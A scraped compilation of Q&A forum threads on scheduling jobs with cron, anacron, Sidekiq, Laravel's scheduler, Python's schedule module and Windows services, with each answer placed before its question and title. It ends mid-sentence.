Because Sail uses an Ubuntu container, you can follow these instructions: https://serverspace.io/support/help/automate-tasks-with-cron-ubuntu-20-04/. Typically crontabs are stored in /var/spool/cron/crontabs, so you might want to create a volume to persist them (otherwise they will be removed on the next restart of your container). You can connect to your container with docker-compose exec laravel.test bash, I believe. Supervisord is already installed.
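As a minimal sketch (assuming Sail's default laravel.test service name and the app mounted at /var/www/html; adjust both to your setup), you could install a crontab for the Laravel scheduler from inside the container:
docker-compose exec laravel.test bash
# inside the container:
apt-get update && apt-get install -y cron     # only if cron is not already present
echo "* * * * * php /var/www/html/artisan schedule:run >> /dev/null 2>&1" | crontab -
service cron start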
I'm using Laravel Sail. I want to use Supervisor and cron jobs, but I don't understand how I can configure these things with Sail. I can't find any examples of how to do this.
How can I configure Supervisor and scheduling with Laravel Sail?
I did it without any problems as follows:
$ crontab -e
Then I set a restart for a container every 5 minutes:
*/5 * * * * docker restart <containername>
I have a container that runs under a root account, which I can start using docker start containername, and I want crontab to start it. So, as root, I used crontab -e and set an entry like this:
* * * * * /usr/bin/docker start containername
but it won't work. I also tried
* * * * * root /usr/bin/docker start containername
with no luck. Does anyone have a clue on how I can make this work?
Crontab won't restart Docker container
You could pass in the calculated difference in order to send what Sidekiq expects, e.g. DateTime.parse("10/20/2014") - DateTime.now, so:
delay_interval = DateTime.parse("10/20/2014") - DateTime.now
TextWorker.delay_until(delay_interval).perform_async(@user_contact)
I am using the https://github.com/mperham/sidekiq gem in a Rails app to schedule tasks at a specific date and time, e.g. send an appointment reminder 10 minutes before the appointment's scheduled time.
class TextWorker
  include Sidekiq::Worker
  def perform(appointer_id)
    number = Usermodel.find_by_id(appointer_id).contact
    Message.create(:from => email, :to => number, :body => 'Thank you...Your appointment is at 10/1/2015 Sun, at 12pm')
  end
end
and calling it here in the appointments controller:
class Appointments_controller
  def create
    TextWorker.delay_until(10/20/2014, 13:40).perform_async(@user_contact)
  end
delay_until doesn't work with a specific date/time. Is there any other way to perform a task at a specific date/time in Sidekiq? If so, how?
Rails + Sidekiq: how to perform a task at a specific date and time
Use a PHP mailer class such as PHPMailer or SwiftMailer; you can send mails directly through SMTP that way, which will be much faster. And yes, sending large quantities of emails is best done via cron, so you send X emails every minute. You will avoid server overload that way. If you can't create cron jobs on your server, I suggest you switch your hosting provider; otherwise the website you linked is your only viable alternative (but you are depending on some third party this way, which isn't really cool).
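As a minimal sketch of the batching setup (the script path and log file are hypothetical), the crontab side is just one entry, and the PHP script it calls would pick the next batch of, say, 20 unsent messages from a queue table, send them, and mark them as sent:
* * * * * php /path/to/send_mail_batch.php >> /var/log/mail_batch.log 2>&1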
I'm preparing a website that will send email notifications to registered users. From my experience I know that sending emails is a somewhat painful process for PHP, especially when we're talking about thousands. One of my websites sends email every now and then to 1000-1500 people. It takes around 5 minutes for PHP to accomplish that, so we run it overnight when the server load is the lowest. I'm using the native mail() function without any SMTP. This runs fine on a dedicated server, but I'm not a big fan of this solution. I want to be able to send similar amounts at any time without risking the server going down (and it being blacklisted). I've read that the ideal solution is to send emails in batches (say of 20) every couple of minutes from a script that's triggered by cron. This seems to me like a really reasonable idea, but... what if I don't have access to cron (not all hosting providers give access to it) and the website isn't popular enough to be able to trigger the script on page load? I'm insisting on using my server to do the mailing and not any external solution.
PS. I found solutions like this: http://www.mywebcron.com/ but is this any good?
EDIT: Just to add: I'm using CodeIgniter, and the rate at which emails are sent from my current server is usually 0.2 sec per email.
Opinion on sending emails from php
Here's a possible solution:
from datetime import datetime
import schedule

def something():
    day_of_month = datetime.now().day
    if (day_of_month > 7 and day_of_month < 15) or day_of_month > 21:
        return  # not the first / third Monday of the month
    # your code

schedule.every().monday.do(something)
The scheduler will run every Monday, but we return early if this is not the first or third Monday of the month.
Background: I need to run automatic tasks every first and third Monday of the month for a server. This should be realised via Python, not crontab. I found the Python module "schedule", but its documentation is not detailed.
https://pypi.org/project/schedule/
https://schedule.readthedocs.io/en/stable/
Does anybody know how to do this?
import schedule

def TestFunction():
    pass

schedule.every(1).monday.do(TestFunction)
schedule.every(3).monday.do(TestFunction)
schedule.run_pending()
Will this be executed on the first Monday of the year, the month, or every Monday?
Python - Run Job every first Monday of month
The shebang (#!) line of the script should point to the (perlbrew-installed) perl it is meant to run under. (This should be done as part of installing the script.) That's all you need.
0 2 * * * /path/to/script arg1 ...
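For example, a shebang pointing at a perlbrew-managed interpreter might look like the line below (the version and path are illustrative; use whatever `which perl` reports while the desired perlbrew perl is active):
#!/home/myhome/perl5/perlbrew/perls/perl-5.34.0/bin/perl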
I have tried the following and find it to work. This is done with a non-privileged user. First find out where your perl command is:
# which perl
Then check the value of PERL5LIB:
# echo $PERL5LIB
Then, in the crontab file of the user, do something like:
MAILTO=<my email address for the jobs output>
HOME=/home/myhome
PERL5LIB=/home/myhome/perl5/lib/perl5
0 2 * * * $HOME/<rest of path to perl>/perl $HOME/<path to my perl script> arg1 ...
This will run a job at 2am and seems to find all Perl libs correctly. My question is: is this complete and portable? Is there a better way? I have seen a number of bash and perl scripts out there that are supposed to prepare the environment for the execution of a Perl script, but this seems to suffice. Any advice will be welcome!
EDIT: From the comments to the question, it seems that I am using a "bad" mixture of Perlbrew and local::lib. The way to make sure libraries get installed inside a particular Perlbrew version is answered here: How do I install CPAN modules while using perlbrew?. Both cpan and cpanm will install under PERL5LIB when you are using local::lib unless you explicitly tell them to do otherwise. Also, cpanm seems to be better suited to working along with Perlbrew.
Running a Perl script from crontab when you use Perlbrew
If you're using PHP, you can figure out both what time it is on your server and what timezone it is in:
echo date('c');
It'll output something like:
2017-08-15T02:40:09+00:00
I'm using GoDaddy hosting and running a cron job for CodeIgniter. It should run every day at 10am, so in the crontab I tried this:
00 10 * * * export TZ=Asia/Dhaka; wget http://www.example.com/function
00 10 * * * TZ=Asia/Dhaka; wget http://www.example.com/function
00 10 * * * export TZ=Asia/Dhaka; /usr/bin/curl "http://www.example.com/function"
Those commands always execute in another timezone, maybe UTC, but I need the Asia/Dhaka timezone (UTC+6:00). How do I write the correct timezone command and where do I write it? The GoDaddy cron tab looks like this
Godaddy Hosting Cron Job Timezone setting
Run the command daily, and have the script record the date on which it last performed a backup. When it starts up, get the current day of the month. If it's the 22nd of the month, run normally and save the date. If it's after the 22nd and the last run was in the same month, exit. If it's before the 22nd and the last run was the previous month (don't forget to account for wrapping from 12 to 1), exit. The date should be saved in a file somewhere.
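A rough shell sketch of that logic (the stamp-file path, the target day of 22, and the backup command are examples, and the previous-month calculation assumes GNU date); run it from a daily cron or anacron entry:
#!/bin/sh
STAMP="$HOME/.backup.lastrun"                        # holds YYYY-MM of the last run
DOM=$(date +%d); DOM=${DOM#0}                        # day of month without leading zero
NOW=$(date +%Y-%m)
PREV=$(date -d "$(date +%Y-%m-15) -1 month" +%Y-%m)  # previous month, handles the 12 to 1 wrap
LAST=$(cat "$STAMP" 2>/dev/null)
# already ran this month
if [ "$DOM" -ge 22 ] && [ "$LAST" = "$NOW" ]; then exit 0; fi
# before the 22nd and the last run was this month or the previous one: wait for the 22nd
if [ "$DOM" -lt 22 ] && { [ "$LAST" = "$NOW" ] || [ "$LAST" = "$PREV" ]; }; then exit 0; fi
/home/myself/backup.sh && echo "$NOW" > "$STAMP"     # run and record the month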
I would like to run jobs once a month on, let's say, the 22nd day of the month, on my laptop running Ubuntu 12.04. Since it's a laptop, and I may not always even use it every 22nd day of each month, cron is not a very good option. Looking into anacron, there seems to be a limitation. Namely, you can specify a 'period', but not a specific day of the week or day of the month, as suggested by the anacrontab file format:
# cat /etc/anacrontab
period  delay  job-identifier  command
7       15     test.daily      /bin/sh /home/myself/backup.sh
I would like to be able to say: if we're on the 22nd day of the month, and of course the laptop is running, run the job. If the 22nd has passed and you have not run the job, run it as soon as I boot. I am about to do something ugly, like mixing cron and anacron with custom scripts or writing my own bash script using timestamps, probably reinventing the square wheel in the process. Any idea about a best course of action? Cheers.
Run job every month on a specific day (with anacron?)
Please look at http://thu.openerp.com/open-days-2012/gunicorn.html
Edit: he references the openerp-cron-worker script; it's currently in the process of being merged into 6.1, check the code: https://code.launchpad.net/~openerp-dev/openobject-server/6.1-here-comes-the-bogeyman-vmt
Edit 2: meanwhile the openerp-cron-worker script has landed in lp:openobject-server/6.1 at rev4184 (http://bazaar.launchpad.net/~openerp/openobject-server/6.1/revision/4184)
Is it possible to have a more specific configuration for OpenERP 6.1 and Gunicorn? I'm interested in running OpenERP on a WSGI web server and I would like more detailed information about the cron task management :) There is poor documentation on the web.
OpenERP and Gunicorn
Sorry, but I don't consider that a good idea. If you're planning on restarting Apache every X minutes, even though it may not need it, I see plenty of downside there but no upside. If you're just checking and restarting when needed, such as with a running process which can detect when a change is needed, that might be okay. Personally, I wouldn't even do that, since I'd rather keep control over deployment changes. For example, if you wanted to get a whole lot of stuff installed during the working day ready for restart, but not actually activate it till quiet time. Of course, in a robust environment, you'd be running multiple servers so you could offline them one at a time for changes, without affecting anyone.
I have a server running virtual hosts that get changed quite often. Rather than someone actually going to the server and typing in the Apache restart command, I was thinking of making a cron job (every 1, 5 or 10 minutes, maybe only during working hours, when changes to the virtual hosts are actually made) to restart Apache gracefully:
sudo apachectl graceful
I found an explanation here on Stack Overflow that goes like this: "Graceful does not wait for active connections to die before doing a "full restart". It is the same as doing a HUP against the master process. Apache keeps children (processes) with active connections alive, whilst bringing up new children with new configuration (or nicely cleared caches) for each new connection. As the old connections die off, those child processes are killed as well to make way for the new ones." Would this mean that there would be little to no impact on the visitor's experience (long wait times), or should I just stick with manually restarting Apache? Thanks!
Would it be considered bad practice to restart apache (with graceful) every 1 / 5 / 10 minutes?
You'd be best off running a separate script that runs eternally and watches your database. That way you won't need cron, nor a massive amount of triggers. But you might want to reconsider your entire question. It's not necessary to actually update the bids every second. You only need to fill in the past x minutes/hours when someone actually points their browser at an auction or makes a manual bid. If it's all autobids, you can calculate forwards and backwards with ease.
I have an auction website which lets my users place an unlimited number of autobiddings. To monitor these autobiddings, something has to check the database every second. My question is whether it is better to use MySQL trigger events or a cron job every minute that executes a 60-second looping PHP script. If I use the MySQL trigger events, there will be hundreds of events stacked on each other and fired at different times. Is this even possible? And isn't the server load going to be enormous? I heard somewhere that the database will be locked while there is a scheduled event. I am using InnoDB tables, btw. I hope someone can shed some light on this topic. Regards!
Mysql trigger/events vs Cronjob
Personally, the way I handle errors is to simply send STDERR to a log file, and then periodically check that file. An easy way to do that is to append 2>/path/to/log to the crontab entry. As far as having duplicates of the same program running, I prefer to have the script attempt to lock something (a file or a local network port). If it fails to obtain that lock, the script does not run. This way, if an existing script is currently running, a new one cannot obtain the identical lock.
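One concrete way to implement that lock (assuming the util-linux flock utility is available; the schedule and paths are placeholders) is to wrap the crontab entry with flock -n, which exits immediately instead of starting a second copy while another instance still holds the lock:
*/5 * * * * flock -n /tmp/myjob.lock php /path/to/myjob.php 2>/path/to/myjob.err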
A very common need for an application is to run a script every X minutes/hours. Basically it's nothing complicated, just some PHP code and a crontab entry. Although I've written quite a few of those cron jobs in the past years, I still haven't seen many best practices. As with every kind of "background processing", so many things can go wrong, especially in a production setting. Among them:
an error occurred during execution of the cron job and the script died after processing half of the data
the cron job was accidentally started twice, by another process / by user error / whatever
the cron job took way longer than expected and the script is called again although it is not done processing data
etc.
What are some best practices for writing rock-solid, robust cron job scripts? Writing a lock file asserting that only one instance runs, extensive logging and monitoring in order to prevent sending tens of thousands of duplicate emails? What are your ideas?
Cronjob – how to do it the right way?
Please see the comments for the full solution. There are multiple approaches to circumvent the 10-minute rule (which is prevalent on serverless platforms), but here's something that can help you. I suggest separating the task into three parts:
A cloud function that closes the tab when called.
A scheduled function that calls it (https://firebase.google.com/docs/functions/schedule-functions).
A way to start and stop the scheduled function.
I am not sure how Firebase functions work, but I have worked with Azure Functions before, and those can be controlled with the command line (CLI) or with an SDK for your language of choice. To cancel using the command line, try something like this:
firebase functions:delete scheduledFunction
from "How to cancel a scheduled firebase function?". Now what's left is to figure out how to start the function, and whether it's possible to pass in a parameter to schedule it. Good luck!
I am trying to create an app that simulates opening a tab at a bar. I am running into one issue that I can't seem to figure out. It goes as follows:
When someone opens a bar tab, dynamically create a scheduled task that executes code to close the tab after 24 hours.
If the tab gets closed before the 24 hours, cancel the scheduled task.
If the tab doesn't get closed after 24 hours, execute the code described in step 1 to initiate a payment on the card used to open the tab.
I was initially looking into Firebase Functions, and was thinking about using a setTimeout() callable function, but after doing some research I found that Firebase Functions cannot run for longer than 9 minutes.
NOTE: I would like this to be dynamic, meaning it should account for a variable number of users. There could be 100 or 1000 users on the platform, and each of them needs the ability to have a unique scheduled task (sometimes multiple per user).
How to create a dynamically scheduled task?
There is no built-in function within SQL Server to generate the next date based on a CRON expression. The only way would be implementing cron expressions in C#, generating a DLL, and then registering the DLL with SQL Server CLR. References:
https://social.msdn.microsoft.com/Forums/en-US/3e0ebe5a-d452-4893-bcef-0a1e2520c076/convert-cron-expression-to-datetime?forum=transactsql
https://github.com/atifaziz/NCrontab/wiki/SQL-Server-Crontab
I have a column that contains a CRON expression that represents how often a user has to perform a task. I would like to build a view that lists the date and things to do for a given user, but I need to calculate the next CRON occurrence as a datetime in T-SQL. How can I interpret my CRON expression in SQL?
Example: column value = [0 30 8 1 *?]
I would write: SELECT CrontabSchedule('0 30 8 1 *?', GETDATE()) FROM dbo.UserTasks
Does anyone have a solution?
CRON expression to next DateTime with T-SQL on SQL server
There is no easy way to distinguish staging and production environments. If I remember correctly, you could use the Service Management REST API to get more details about the current deployment. You just need to get the RoleEnvironment.DeploymentId and communicate with the REST API by providing a valid X509 certificate. http://msdn.microsoft.com/en-us/library/windowsazure/ee460806.aspx
I have created an ASP.NET application which is deployed on Azure. Whenever I want to publish it to Azure, I use a staging server to deploy to, and after testing everything on staging, I just swap the two. But there is a problem: I have some startup tasks that create scheduled tasks for cron jobs. These tasks are also copied to the production server from staging, and the cron jobs are run twice, once on production and once on staging. I want them to run only on production, not on staging. How can I prevent this duplicated cron job problem? Please give me some suggestions.
Both production and staging server running same cron in Azure
The last parameter when you're initializing your CronJob indicates that it should execute the job immediately:
new CronJob(interval, processDataOnDate(), function() { msg.reply("hello") }, true);
That will cause the job to execute immediately, even though your execution date is in the future. See: https://www.npmjs.com/package/cron#api
So, I've got some JS code which is a slackbot that is supposed to simply listen and parse the date provided, then start a CronJob to run a certain function according to the cron or date format provided. Something like this:
var CronJob = require('cron').CronJob;
...
robot.respond(date, function (msg)) {
  if(!isValidDate(date))
    msg.reply("not a valid date);
  var interval = isCronDate(date) ? date : new Date(date);
  msg.reply("Job about to be scheduled.")
  var schedule = new CronJob(interval, processDataOnDate(), function() { msg.reply("hello") }, true);
}
I've got a coffee file testing this code, and I expect certain responses back, but I do NOT expect the cron job to be executed based on the date I've provided in my test code. However, it is. Is this normal? Does mocha force the code to finish execution due to the fact that this is a unit test, or am I doing something wrong? I am running this to execute my unit test:
mocha --compilers coffee:coffee-script/register
For further information, I am running this as a slackbot, so this is all done in the form of 'say' and 'reply'. One of my tests looks like this:
beforeEach ->
  yield @room.user.say 'bob', '@bot schedule at 2017-05-25 18:00:00'
  expect(@room.messages).to.eql [
    ['bob', 'bot schedule at 2017-05-25 18:00:00']
    ['bot', 'Job about to be scheduled']
  ]
The test fails and informs me that the actual result included the message 'hello' from the bot, despite the fact that the date I've provided in my test is in the future.
Node.js CronJob execution when using mocha for testing
Unix and its clones tend to have the concept of the output of one utility program/command becoming the input of the next. In your example the result is (I think) that the nice will actually affect the niceness of the ionice; only the ionice would have an effect on PHP. (UPDATE: Actually, it should inherit its niceness, see comment.) I found a page that suggests doing the following to have both nice and ionice affect your PHP instance:
ionice -c3 -p$$; nice -n 10 /usr/bin/php /path/to/your/script.php
I want to run a script via cron at low I/O and CPU priority. If I understand correctly (and I might not), I could just add proc_nice(10); to my script to lower the CPU priority, but there is no PHP equivalent for I/O priority. There appears to be a shell command ionice for this, but I am a Linux idiot and I don't know what I am doing. Would this be the correct line for my cron file if I want to use both nice and ionice to lower the priority of the script in question?
0 * * * * /usr/bin/nice -n 10 /usr/bin/ionice -c 3 /path/php/bin/php /path/script.php
I got the -c3 parameter from here ("places the process in the idle scheduling class"), and I'm not confident that's what I want. Is there a benefit to using the PHP call to proc_nice() rather than this method?
EDIT: my cron script is not running using the above, so I've definitely misunderstood something
how can I lower the CPU and I/O priority of a cron script? [closed]
I don't believe there is any way to unset it: you might want to just pipe the output of the commands you don't want emailed into /dev/null.
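For example (the address and paths are placeholders), with MAILTO set at the top of the crontab, only jobs whose output is not redirected will generate mail:
MAILTO=admin@example.com
0 2 * * * /usr/local/bin/wanted-report                   # any output is mailed to MAILTO
30 2 * * * /usr/local/bin/noisy-job > /dev/null 2>&1     # nothing left for cron to mail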
As the documentation for crontab explains, if MAILTO is not set then output goes to the owner of the crontab; if MAILTO is set and not empty, it says where mail should go; and if it is set and empty, no mail is sent. Is there any way to unset environment variables like MAILTO in cron after it has already been set to something? I already tried the obvious unset MAILTO and MAILTO=, but crontab -e does not accept those. I have a workaround (make sure that everything for which I want the default mailing behavior comes before the original). However, I'm writing a script to write cron jobs, and it would be nice to be able to set/unset MAILTO without having to reorder commands. If it matters, this will be running on a Linux system under Vixie cron.
Edit: Clarification. I want jobs to either get mailed to the owner or to a user named in a MAILTO. I don't want the behavior that MAILTO='' causes, where jobs get mailed to nobody at all.
How do you unset MAILTO in crontab?
Not directly answering your question, but proposing another solution: if you want to set up cron jobs for your development environment, it's best to use Homestead, for its Linux standards compliance. For small projects that I develop directly inside macOS, I run the following command inside the project root (in a separate terminal tab) to have my jobs run every minute:
while true; do php artisan schedule:run; sleep 60; done
This helps to make sure the cron jobs are only run while I'm developing. When I'm done, I Ctrl+C that command and can be sure nothing unexpected happens while I'm not watching. Plus it gives me the freedom to adjust the interval by simply choosing another number of seconds for the sleep command. This can save time when developing.
Update for Laravel 8.x: Laravel now offers the above as a single artisan command:
php artisan schedule:work
I have a command scheduled in the Laravel 5.4 scheduler and would like to start the Laravel cron on Mac OS X El Capitan.
app/Console/Kernel.php:
<?php
namespace App\Console;
use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;
class Kernel extends ConsoleKernel
{
    protected $commands = [
        'App\Console\Commands\GetToken'
    ];
    protected function schedule(Schedule $schedule)
    {
        $schedule->command('gettoken')->everyMinute();
    }
    protected function commands()
    {
        require base_path('routes/console.php');
    }
}
My GetToken.php makes an API call and then a DB change. I believe that this is working properly, as I can run the task directly from the CLI using:
php /path/to/project/artisan schedule:run 1>> /dev/null 2>&1
To edit my cron file I use:
env EDITOR=nano crontab -e
I then add:
* * * * * php /path/to/project/artisan schedule:run >> /dev/null 2>&1
I save with ctrl+o and exit with ctrl+x. Re-editing the file shows that the changes have saved. Running crontab -l shows the text that I entered into the crontab file. My cron never runs. I can only get it to run once by running it manually using the command I mentioned above.
Starting the Laravel cron job on a Mac
Try making a script with the command:
script.sh:
#!/usr/bin/env sh
node /home/campaigns/reporting/UNIT_TESTS/testCron.js > /home/campaigns/reporting/UNIT_TESTS/cron.log
and then adding that to cron:
*/5 * * * * /path/to/script.sh
Make sure to make the script executable (chmod +x script.sh).
I have a crontab entry that is supposed to execute a Node.js script like this:
*/5 * * * * node /home/campaigns/reporting/UNIT_TESTS/testCron.js > /home/campaigns/reporting/UNIT_TESTS/cron.log
However, it doesn't execute and the log file isn't updated. When I run the script manually, everything works though. Any ideas?? Thank you, Igor
Node.js script not executing from crontab
I configured several different operating systems to work with a couple of cron flavors and RVM. I first tried RVM's official solution to the problem, but it didn't work under FreeBSD and Gentoo. I had to manually add all relevant paths as shown below, but first type crontab -e in order to launch the crontab editor [1]:
# atmat's crontab configuration
SHELL=/bin/bash
PATH=/home/atma/.rvm/gems/ruby-1.9.3-p0/bin:/home/atma/.rvm/gems/ruby-1.9.3-p0@global/bin:/home/atma/.rvm/rubies/ruby-1.9.3-p0/bin:/home/atma/.rvm/bin:/usr/local/bin:/usr/bin:/bin:/opt/bin:/usr/i486-pc-linux-gnu/gcc-bin/4.5.3
RUBYLIB=/home/atma/.rvm/rubies/ruby-1.9.3-p0/lib/ruby/1.9.1
GEM_HOME='/home/atma/.rvm/gems/ruby-1.9.3-p0'
GEM_PATH='/home/atma/.rvm/gems/ruby-1.9.3-p0:/home/atma/.rvm/gems/ruby-1.9.3-p0@global'
RUBYOPT=rubygems
%nightly,mail(no) * 8-9 /home/atma/.rvm/rubies/ruby-1.9.3-p0/bin/ruby /usr/local/bin/morula -s username update
The above example is working under Gentoo GNU/Linux using fcron, a more flexible, beautiful and powerful alternative to standard cron, but it will work with any cron.
[1] This command will open crontab with your default system editor.
I'm trying to run a simple Ruby script on my old PPC machine running 10.5 in an RVM environment. Searching on SO, I've followed the chosen answer from this post. This is the line in cron as a result:
SHELL=/bin/bash
00 * * * * BASH_ENV=~/.bash_profile && /bin/bash -c '~/deggy/onlineGW.rb'
This command runs fine in Bash at the root of the user sam. Here's the salient part of my script:
#!/usr/bin/env ruby
require 'open-uri'
require 'nokogiri'
...
Here's the output of the error from cron:
X-Cron-Env: <SHELL=/bin/bash>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=sam>
X-Cron-Env: <USER=sam>
X-Cron-Env: <HOME=/Users/sam>
Date: Mon, 6 Jan 2014 03:15:00 -0600 (CST)
/Users/sam/deggy/onlineGW.rb:3:in `require': no such file to load -- nokogiri (LoadError)
OK, since I'm running RVM I have set my default Ruby to 1.9.3 and, as I mentioned above, the command executes in Terminal but not in cron. Is there another environment in play? So clearly, there's something I'm overlooking. Help me to see it, sam
Gem not found in Ruby cron job in RVM env
Assuming this is a Linux-like OS:
wget -O /dev/null -q http://www.example.com/program/timecheck
The file is the output from wget. This option (-O) tells it to write the output to /dev/null, thus discarding it.
Currently, I have one PHP function which is run by cron. It's the function that checks a timestamp and closes the topic. To check the timestamp and make live updates, I have to use cron. I run cron with this command:
wget -q http://www.example.com/program/timecheck
Everything seemed to work perfectly, so I didn't check my server for quite a long time. But today I checked and found out that more than 500,000 files called timecheck have been created in the root directory. I checked through the code and I'm sure there's no code for creating the file. What I would like to know is: is it because of the wget -q command? If so, what command should I use to execute the URL? Thanks for your help. With Regards,
Does the cron command wget -q create files on the server?
On my Linux box,
crontab -u userName -l > fileName
lists the crontab of userName in fileName. Then I would use a Ruby (or another language) script to update the file. Finally I would use
crontab -u userName fileName
to update the crontab for userName.
I would like to include cron tasks in my Capistrano deployment files instead of using the following command to manually edit the crontab file:
crontab -e [username]
Is there a script I could use within the Capistrano run command to set the contents of the crontab?
Creating crontab via Capistrano instead of using crontab -e
To call something periodically, see TimerTask.
We need to run one function periodically in a Java web application. How can I call a method of some class periodically? Is there any way to call a function when some event occurs, like high load on the server and so on? What is crontab? Does it work periodically?
Call function periodically in Java
If you want a task to run on a regular interval as opposed to constantly, you should look into using the Task Scheduler. If you need your code to be a service, but to be "activated" every hour, the easiest approach would be to make your service a COM object and have a simple task scheduled every hour that invokes a jscript/vbscript that creates your COM object and calls a simple method on it. The alternative is to use any of the wait APIs to "waste" an hour without consuming cycles. Note that you also have to consider some interesting design decisions that depend on what your scenario is:
how is your service going to be started if it crashes or is stopped by the user?
if you are started after more than an hour, should you run again or do you need to wait to get on the exact hourly schedule?
how do you keep track of the last "activation" time if the timezone or daylight saving time has changed while you were not active?
does your service prevent the computer from going to sleep/hibernate on idling or when the laptop cover is closed? If not, do you need to wake the computer on the hour to get your service working on your schedule?
Some of those are taken care of by the Task Scheduler, so I would strongly recommend going that route vs. waiting for an hour in your code.
I'm able to build a Windows service and install it. I'm curious how I can run this service every hour; I want it to run every hour, periodically. I also need to know the hour range in which it runs so that I can store it somewhere. How can I do that?
Edit: This service will be installed on many machines, so I don't want to create a scheduled task on, say, 100 servers.
Windows service that will run every hour
You mixed up the curl PHP module and the system executable. Connect to a shell and enter the following:
sudo apt-get install curl
If you don't want to install curl, try to use wget.
I'm trying to run this script from the cron job schedule on an Ubuntu Linux 10.04.1 server, but I get the following output: Curl seems to be enabled on the server; this is the extract from the phpinfo file: The cron script is to clean the log files in a Magento DB. I have tried various things but just can't get it to work. Any ideas would be a great help, thank you.
script error on linux ubuntu /bin/sh: curl: not found? [closed]
If you haven't done anything on your system, try looking in /var/log/syslog. Use grep to filter/search:
grep CRON /var/log/syslog
You can also pipe the output of your cron job to a specific location as well:
37 13 30 6 * /media/xxx/xxx/bin/python /home/xxx/PycharmProjects/testcron.py >> /var/log/job.log 2>&1
I am absolutely new to Ubuntu and cron. I want to run some scripts. I edited and saved the crontab file:
37 13 30 6 * /media/xxx/xxx/bin/python /home/xxx/PycharmProjects/testcron.py
testcron.py code:
print('Hellow World')
input('Test Success')
I assumed that this would show me if the cron job ran, but no window popped up at the time I set. Can someone point me to how to check if it ran? Did I configure this wrong?
How to check if cronjob ran in ubuntu?
Sorry for waking up a sleeping thread, but as many of the answers no longer work and I found this page while looking, I figured I'd add my solution here. Create the script check_service.sh and set SERVICENAME as desired:
#!/bin/bash
SERVICENAME="WHATEVER_SERVICE_YOU_WANT"
systemctl is-active --quiet $SERVICENAME
STATUS=$?  # return value is 0 if running
if [[ "$STATUS" -ne "0" ]]; then
    echo "Service '$SERVICENAME' is not currently running... Starting now..."
    service $SERVICENAME start
fi
Make the script executable:
chmod +x check_service.sh
Finally, add the script to root's crontab by running sudo crontab -e:
# min hour day month dow cmd
*/1 * * * * /full/path/to/check_service.sh
Save the crontab, and wait patiently!
I want a one-liner that can check and restart services, such as Apache, if they are inactive/dead. I want to put it in crontab and run it every minute to make sure the service is still running.
Cronjob to check and restart service if dead
You could move your "secret files" into a subfolder, then create a .htaccess file in there that prevents access to that file from everyone except the server that is running the cron job. Example:
Deny from all
Allow from 123.123.123.123
If you have shell access, you might also put the scripts outside of the web-accessible folder and run them directly via the command line or a cron job, like this: php script.php
I am currently working on a new project which involves using cron jobs. The cron script basically runs an SQL query, generates the data into a file, and sends that file to another server via FTP. The script is on a live website (www.website.com/sendOrders.php). I don't see any security issues or threats, and I think it is highly unlikely that anyone will find the PHP script on the server. However, I don't want the script to be executed by any outsiders. Is there a way I can protect this script? Thanks, Peter
Can I protect my CRON scripts from remote users?
You may use the Task Queue Python API.
How can I run background tasks on App Engine?
Background tasks on App Engine
You have to set up a single cron job that calls the schedule runner every minute:
* * * * * php /path/to/artisan schedule:run 1>> /dev/null 2>&1
Read Laravel's Scheduler docs for more info.
I have made a scheduler. When I call it with php artisan userRanking it works. This is the code in Kernel.php:
protected $commands = [
    \App\Console\Commands\UserRanking::class,
];
protected function schedule(Schedule $schedule)
{
    $schedule->command('userRanking')->everyMinute();
}
How do I dispatch it so that it runs automatically?
Laravel scheduler is not running automatically
As @Mob said, the surefire way to achieve this is to put the script in a place where it cannot be accessed through the web server. If this is not possible or you don't want to do it for some reason, you need to detect whether the script was called via a web server or through the command line. My favourite approach for this (there are many) is:
$isRunningFromBrowser = !isset($GLOBALS['argv']);
This means that if $isRunningFromBrowser is true, you just exit/return an error message/whatever.
Environment: Linux, PHP. Scenario: I have written a script which will be set up as a cron job. Now the case is that I want the script to run only through cron and not through any browser (any web browser, including mobile browsers). So I am looking for a function something like browserValidate. The script is written in an MVC framework and will be run as /usr/bin/GET http://xyz.com/abc/pqr. Please help me with this. Thanks in advance.
PHP code to stop a script from being run from a browser
If it's practical, you could use shell_exec or include within the first PHP file to run the second file. If this is placed at the end of the first file, it will only be executed if the script successfully reaches that point, and you can use PHP code to verify that the first part completed successfully.
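Another option, if both scripts are runnable from the command line, is to chain them in the crontab entry itself (the schedule and paths here are placeholders); the && runs cron2.php only when cron1.php exits with status 0, so cron1.php should exit non-zero on failure:
0 2 * * * php /path/to/cron1.php && php /path/to/cron2.php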
How do I set up a cron job (cron2.php) to run after and only after a cron job (cron1.php) runs successfully?
How to run cron job when another cron job finishes?
Let cron start the job one time, the first time. Put the program in an infinite loop and sleep() for 1 second at the end of each loop, like this, in C:
#include <unistd.h>

int main(int argc, char **argv)
{
    while (1) {
        // do the work
        sleep(1);  /* sleep for one second */
    }
}
Could that work?
How can I run cron every second? There's only a minutes option by default.
Cron: running cron every 1 second?
You cannot specify a store scope for a Magento cron job, but you can add additional arguments that you can use inside of it. Specify an additional node that you can process via your cron method:
<crontab>
    <jobs>
        <job_name>
            <schedule>
                <cron_expr>* * * * * *</cron_expr>
            </schedule>
            <run>
                <model>module/observer::myJob</model>
            </run>
            <store>store_code</store>
        </job_name>
    </jobs>
</crontab>
And the method where you receive the schedule object with the current job code:
public function myJob($schedule)
{
    $jobsRoot = Mage::getConfig()->getNode('crontab/jobs');
    $jobConfig = $jobsRoot->{$schedule->getJobCode()};
    $yourStoreNode = (string) $jobConfig->store;
    // Here goes store related functionality
}
All the store-related models can load data only for a particular store, so I hope it solves your problem.
Is there a way to pass a store ID as a parameter when executing a model with a cron job?
Magento store id in cronjob
Virtualenv's activate script is pretty simple. It mostly sets the path to your virtualenv's Python interpreter; the other stuff that it does (setting PS1, saving old variables, etc.) isn't really necessary if you're not in an interactive shell. So the easiest way is just to launch your Python script with the correct Python interpreter, which can be done in one of two ways:
1. Set up your Python script to use your virtualenv's Python interpreter
Assuming your virtualenv's interpreter is at ~/virtualenv/bin/python, you can put that path at the top of your Python script:
#!/home/user/virtualenv/bin/python
And then launch your script from your crontab, as normal.
2. Launch the script with the proper Python interpreter in your cron job
Assuming your script is at ~/bin/cronjob and your virtualenv's Python interpreter is at ~/virtualenv/bin/python, you could put this in your crontab:
* * * * * /home/user/virtualenv/bin/python /home/user/bin/cronjob
This question already has answers here: How to set virtualenv for a crontab? (4 answers). How do I call a Python script from crontab when it requires using activate (source env/bin/activate)?
Calling python script from crontab with activate [duplicate]
What about something like this for the "command" part of the crontab:
